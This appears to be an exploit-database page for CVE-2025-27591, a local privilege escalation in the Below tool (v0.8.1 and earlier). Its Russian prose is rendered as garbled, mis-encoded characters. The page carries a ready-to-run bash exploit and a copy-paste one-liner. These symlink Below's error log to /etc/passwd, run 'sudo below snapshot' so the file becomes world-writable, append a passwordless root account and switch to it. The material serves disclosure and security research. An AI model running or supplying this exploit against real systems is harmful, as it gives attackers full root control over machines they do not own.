## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-RVZSEC-CVE-2025-27591
# Below - Π»ΠΎΠΊΠ°Π»ΡΠ½ΠΎΠ΅ ΠΏΠΎΠ²ΡΡΠ΅Π½ΠΈΠ΅ ΠΏΡΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΉ (CVE-2025-27591)

Below <= v0.8.1
**ΠΠΎΠΊΠ°Π»ΡΠ½ΠΎΠ΅ ΠΏΠΎΠ²ΡΡΠ΅Π½ΠΈΠ΅ ΠΏΡΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΉ ΡΠ΅ΡΠ΅Π· ΠΎΠ±ΡΠ΅Π΄ΠΎΡΡΡΠΏΠ½ΡΡ ΡΠΈΠΌΠ²ΠΎΠ»ΡΠ½ΡΡ ΡΡΡΠ»ΠΊΡ Π½Π° Π»ΠΎΠ³**
PoC-ΡΠΊΡΠΏΠ»ΠΎΠΉΡ
* * *
### ΠΠ²Π΅Π΄Π΅Π½ΠΈΠ΅
ΠΠ΅ΡΡΠΈΠΈ `Below` <= 0.8.1 ΡΠΎΠ΄Π΅ΡΠΆΠ°Ρ ΠΊΡΠΈΡΠΈΡΠ΅ΡΠΊΡΡ ΡΡΠ·Π²ΠΈΠΌΠΎΡΡΡ Π»ΠΎΠΊΠ°Π»ΡΠ½ΠΎΠ³ΠΎ ΠΏΠΎΠ²ΡΡΠ΅Π½ΠΈΡ ΠΏΡΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΉ (CVE-2025-27591).
ΠΠ·-Π·Π° Π½Π΅ΠΏΡΠ°Π²ΠΈΠ»ΡΠ½ΠΎ Π½Π°ΡΡΡΠΎΠ΅Π½Π½ΠΎΠΉ ΠΎΠ±ΡΠ΅Π΄ΠΎΡΡΡΠΏΠ½ΠΎΠΉ Π΄ΠΈΡΠ΅ΠΊΡΠΎΡΠΈΠΈ Π»ΠΎΠ³ΠΎΠ² (`/var/log/below/`) ΠΈ Π½Π΅Π±Π΅Π·ΠΎΠΏΠ°ΡΠ½ΠΎΠΉ Π»ΠΎΠ³ΠΈΠΊΠΈ ΡΠ°Π·ΡΠ΅ΡΠ΅Π½ΠΈΠΉ Π² ΠΊΠΎΠ΄ΠΎΠ²ΠΎΠΉ Π±Π°Π·Π΅ Rust, Π»ΠΎΠΊΠ°Π»ΡΠ½ΡΠΉ Π·Π»ΠΎΡΠΌΡΡΠ»Π΅Π½Π½ΠΈΠΊ ΠΌΠΎΠΆΠ΅Ρ ΡΠΎΠ·Π΄Π°ΡΡ ΡΠΈΠΌΠ»ΠΈΠ½ΠΊ `error_<user>.log` Π½Π° Π»ΡΠ±ΠΎΠΉ ΡΠ°ΠΉΠ», ΠΏΡΠΈΠ½Π°Π΄Π»Π΅ΠΆΠ°ΡΠΈΠΉ root, Π½Π°ΠΏΡΠΈΠΌΠ΅Ρ `/etc/passwd`.
ΠΡΠΈ Π²ΡΠΏΠΎΠ»Π½Π΅Π½ΠΈΠΈ `below snapshot` Ρ `sudo` ΠΎΠ½ ΠΏΡΠΈΠ½ΡΠ΄ΠΈΡΠ΅Π»ΡΠ½ΠΎ ΡΡΡΠ°Π½Π°Π²Π»ΠΈΠ²Π°Π΅Ρ ΡΠ΅ΠΆΠΈΠΌ `0666` Π½Π° ΡΠ°ΠΉΠ» Π»ΠΎΠ³Π° ΠΈ Π·Π°ΠΏΠΈΡΡΠ²Π°Π΅Ρ Π² Π½Π΅Π³ΠΎ β Π΄Π°ΠΆΠ΅ Π΅ΡΠ»ΠΈ ΡΡΠΎ ΡΠΈΠΌΠ»ΠΈΠ½ΠΊ.
ΠΡΠΎ ΠΏΠΎΠ·Π²ΠΎΠ»ΡΠ΅Ρ Π²Π½Π΅Π΄ΡΠΈΡΡ ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»Ρ Ρ ΠΏΡΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΡΠΌΠΈ `root` Π±Π΅Π· ΠΏΠ°ΡΠΎΠ»Ρ, ΡΡΠΎ ΠΏΡΠΈΠ²ΠΎΠ΄ΠΈΡ ΠΊ ΠΏΠΎΠ»Π½ΠΎΠΌΡ Π΄ΠΎΡΡΡΠΏΡ ΠΊ ΠΎΠ±ΠΎΠ»ΠΎΡΠΊΠ΅ root.
* * *
### ΠΡΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°Π½ΠΈΠ΅
root@kitploit:~
git clone https://github.com/rvizx/CVE-2025-27591
cd CVE-2025-27591
chmod +x exploit.sh
./exploit.sh
**ΠΠΠ**
ΠΠΎΠ΄ ΡΠΊΡΠΏΠ»ΠΎΠΉΡΠ°
root@kitploit:~
# Title : Below v0.8.1 - Local Privilege Escalation (CVE-2025-27591) - PoC Exploit
# Author : Ravindu Wickramasinghe (aka rvz)
# Usage : usage: ./exploit.sh
u=$(id -un)
rm -f /var/log/below/error_"$u".log
ln -s /etc/passwd /var/log/below/error_"$u".log # symlink log file to /etc/passwd
export LOGS_DIRECTORY=/var/log/below
sudo /usr/bin/below snapshot --begin now 2>/dev/null || true # below chmods 0666 the symlink target and writes to it
echo 'pwn::0:0:root:/root:/bin/bash' >> /etc/passwd # append pwn (root-priv) user entry to /etc/passwd (now writable)
su pwn
_ΠΡΠΈΠΌΠ΅ΡΠ°Π½ΠΈΠ΅: ΠΠΎΠ±Π°Π²ΠΈΠ» exploit.sh Π² README.md ΠΏΠΎΡΠ»Π΅ ΡΠΎΠ³ΠΎ, ΠΊΠ°ΠΊ IppSec Π² ΡΠ²ΠΎΡΠΌ ΠΏΡΠΎΡ
ΠΎΠΆΠ΄Π΅Π½ΠΈΠΈ ΠΈΡΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°Π» ΠΎΠ΄Π½ΠΎΡΡΡΠΎΡΠ½ΡΡ ΠΊΠΎΠΌΠ°Π½Π΄Ρ Π²ΠΌΠ΅ΡΡΠΎ exploit.sh. ΠΠΎΠ΄ΡΠΌΠ°Π», ΡΡΠΎ ΡΠ°ΠΊ Π±ΡΠ΄Π΅Ρ ΡΠ΄ΠΎΠ±Π½Π΅Π΅ Π΄Π»Ρ Π²ΡΠ΅Ρ
. Π‘ΠΏΠ°ΡΠΈΠ±ΠΎ IppSec. ^^_
**ΠΠΠ**
ΠΠ΄Π½ΠΎΡΡΡΠΎΡΠ½Π°Ρ ΠΊΠΎΠΌΠ°Π½Π΄Π° - (ΠΠΎΠΏΠΈΡΡΠΉ, Π²ΡΡΠ°Π²Π»ΡΠΉ ΠΈ Π²ΡΠΏΠΎΠ»Π½ΡΠΉ)
root@kitploit:~
u=$(id -un); rm -f /var/log/below/error_"$u".log; ln -s /etc/passwd /var/log/below/error_"$u".log; export LOGS_DIRECTORY=/var/log/below; sudo /usr/bin/below snapshot --begin now 2>/dev/null || true; echo 'pwn::0:0:root:/root:/bin/bash' >> /etc/passwd; su pwn
* * *
### ΠΠΊΡΡΠΆΠ΅Π½ΠΈΠ΅
* Below <= v0.8.1
* Linux ΠΏΠΎΠ΄ ΡΠΏΡΠ°Π²Π»Π΅Π½ΠΈΠ΅ΠΌ systemd (Ubuntu, Arch, Fedora ΠΈ Ρ.Π΄.)
* ΠΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»Ρ Π² Π³ΡΡΠΏΠΏΠ΅ `sudo` Ρ Π΄ΠΎΡΡΡΠΏΠΎΠΌ `NOPASSWD` ΠΊ `/usr/bin/below *`
* * *
### ΠΠ»Π°Π³ΠΎΠ΄Π°ΡΠ½ΠΎΡΡΠΈ
ΠΠ±Π½Π°ΡΡΠΆΠ΅Π½ΠΎ ΠΈ ΡΠΎΠΎΠ±ΡΠ΅Π½ΠΎ Matthias Gerstner @ SUSE - Π£Π²Π΅Π΄ΠΎΠΌΠ»Π΅Π½ΠΈΠ΅ Π±Π΅Π·ΠΎΠΏΠ°ΡΠ½ΠΎΡΡΠΈ
PoC-ΡΠΊΡΠΏΠ»ΠΎΠΉΡ - Ravindu Wickramasinhge AKA rvz